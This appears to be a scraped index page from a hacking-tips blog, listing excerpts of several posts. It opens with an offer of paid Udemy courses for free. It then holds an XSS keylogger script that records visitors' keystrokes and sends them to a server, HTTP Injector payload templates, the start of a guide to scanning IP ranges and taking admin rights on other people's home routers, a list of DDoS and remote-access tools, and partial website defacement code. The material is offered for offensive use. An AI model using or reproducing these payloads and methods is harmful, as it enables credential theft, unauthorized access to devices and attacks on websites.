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Most Demanding Field Graphics Design with free Udemy course

Hello friends ! How are You all Today I am telling about the Graphic Design as Career Do u know how to print your imagination into picture or print ? It's Graphic Design You can Earn from your home upto 1 lakh per month These are some online site you can use to get project Freelancer Upwork And many more So with out wasting time let's get started 1 Good Banner = 1000  Words And it will generate 10000+ leads to your business.. So it's most important field. You can start now Let me help you to get started I am providing you some courses which are paid but I am giving it free free free ! ( Muh me Pani aaya) Do like Share COMMENT SO CAN GET MORE STUFF LOKE THIS. MISS ME OR NEED HELP THEN BUZZ ME AT Telegram @yesbheda Here is the course link Graphics and all Udemy

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Learn hacking Resources

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XSS keylogger

Keylogger Xss js sample /keylogger // http://.com/lab/webapp/jfp/7 <script> document.forms[0].addEventListener('submit',function(){ new Image().src = "http://localhost:8000/?key="+cap; }); var cap = ''; window.addEventListener("keypress",function(event){ switch(event.which) {     case 13:         cap +='<ENTER>';         break;     case 9:         cap += "<TAB>";         break;     case 8:     if(cap.length != 0){             cap = cap.substring(0, cap.length-1);     }         break;     default:         cap +=String.fromCodePoint(event.which); } }); </script>

Http injector

Http Injector List of Injection methods 1.Normal CONNECT [host_port] [protocol][crlf]Host: [crlf][crlf] 2.Front Inject GET / HTTP/1.1[crlf]Host: [crlf][crlf]CONNECT [host_port] [protocol][crlf][crlf] 3.Front Query  CONNECT @[host_port][crlf]GET / [protocol][crlf]Host: [crlf][crlf] 4.Back Inject CONNECT [host_port] HTTP/1.1[crlf][crlf]GET / [protocol][crlf]Host: [crlf][crlf] 5.Back Query CONNECT [host_port]@domain .com[crlf]GET / [protocol][crlf]Host: [crlf][crlf] Troubleshoot♂¶ &#128581;302 Error code - If you are  302 HTTP header code that means your ISP is redirecting your request to their captive portal page. Normally ISP blacklisted your remote proxy or the HTTP Payload. &#128581;400 Error code - This indicate that your payload is invalid and can't be understand by remote proxy Connection timeout - It could be ...

Find any router password

♻️How to Hack the Home Routers and gain the Admin Rights… &#128174;Requirements: Port Scanner (zenmap,superscan or unicornscan.I use Zenmap) Web Browser (Chrome,Firfox or Safari) Internet Connection(Any kind of Internet connection) First of all I want to tell you why I use Zenmap because Nmap is the best friend of hackers and Zenmap is the graphical user interface of nmap. Instruction on How to Hack the Home Routers and gain the Admin Rights… 1. We should select an IP range. I have selected IP range that includes my public IP address. XXX.XXX.30.0-XXX.XXX.30.255 2. Now let’s scan for home routers. When you finished your scan, You can find IP addresses which has open ports such as http port(80), ftp port(21) and telnet port(23). I have found many IP addesses with port 80 is opened. So I stopped my scan. 3. Now you can access these addesses using your web browser because http port is opened and we need to find whether the web...

Recover deleted pic

How to recover deleted image or video from android (internal storage) without root ? STEP 1: DOWNLOAD AND INSTALL JIHOSOFT ANDROID PHONE RECOVERY AT YOUR COMPUTER. You could download the Windows version at: Android Recovery , download Mac version at: Android Recovery for Mac . After download, you will be lead to install the app at your computer. STEP 2: SELECT DATA GENRE THAT YOU NEED TO SCAN After installation, run the app at your PC. You will see the interface show you four options: “Mul”, “Database”, “WhatsApp”, “All”. Tap One of it according to your own demand. STEP 3: IDENTIFY ANDROID PHONE OR TABLET BY COMPUTER. First, connect your android device to computer via USB cable. Then, turn on USB debugging at android equipment. If the app failed to identify your equipment, install related USB driver at your computer. STEP 4: SCAN ANDROID DEVICE AND EXPECT THE RESULT After identification, click "Start" for scanning....

Varius hacking

1-DDoS 2-Forensics 3-Programming 4-Exploitation 5-Phone Hacking 6-Server Hacking 7-Client Hacking 8-Website Hacking 9-Network Hacking 10-Wireless Hacking 11-Reverse Engeenering 12-Information Gathering #DDoS 1-MDK3 2-LOIC 3-HULK 4-DDOSIM 5-Ufonet 6-Hping3 7-Xerxes 8-Hammer 9-Slowloris 10-Websploit 11-GoldenEye 12-Metasploit 13-Aireplay-ng 14-Slowhttptest #Forensics 1-COFEE 2-Volafox 3-Autopsy 4-Foremost 5-Hashdeep 6-Binwalk #Programming 1-Notepad++ 2-Visual Studio 3-Text Editor #Exploitation 1-Metasploit 2-Sqlmap 3-Core Imact 4-W3af 5-BeEF 6-Dradis #Phone_Hacking 1-Metasploit 2-Apktool 3-Droidjack 4-AndroRAT 5-Spynote #Server_Hacking 1-SQLmap 2-Jsql 3-Havij 4-Hydra 5-Metasploit 6-Armitage 7-Brupsuite 8-Owasp-ZAP 9-Netsparker 10-Acunetix 11-OpenVAS #Client_Hacking 1-Darkcomet 2-FatRat 3-Veil-Evasion 4-Shallter 5-Unicorn 6-Setoolkit 7-Armitage 8-BeEF-Framework 9-EmPyre 10-FakeImageExploiter 11-Pupy 12-DFU-Programm...

Deface page

Code of deface page..... [8/6, 4:47 PM] ‪ +91 97998 89428 ‬: <!------------ COded By Cyb3rD3v1L --------> <link rel="icon" type="image/gif" href=" "> <html> <head><script type='text/javascript'> var msg = "LOL!! Guess what?! you got owned :v h "; msg = " " + msg;pos = 0; function scrollTitle() { document.title = msg.substring(pos, msg.length) + msg.substring(0, pos); pos++; if (pos > msg.length) pos = 0 window.setTimeout("scrollTitle()",300); } scrollTitle(); </script> <script language=JavaScript> var message="NO NO NO YOU CAN'T xD"; function clickIE4(){ if (event.button==2){ alert(message); return false; } } function clickNS4(e){ if (document.layers||document.getElementById&&!document.all){ if (e.which==2||e.which==3){ alert(message); retu...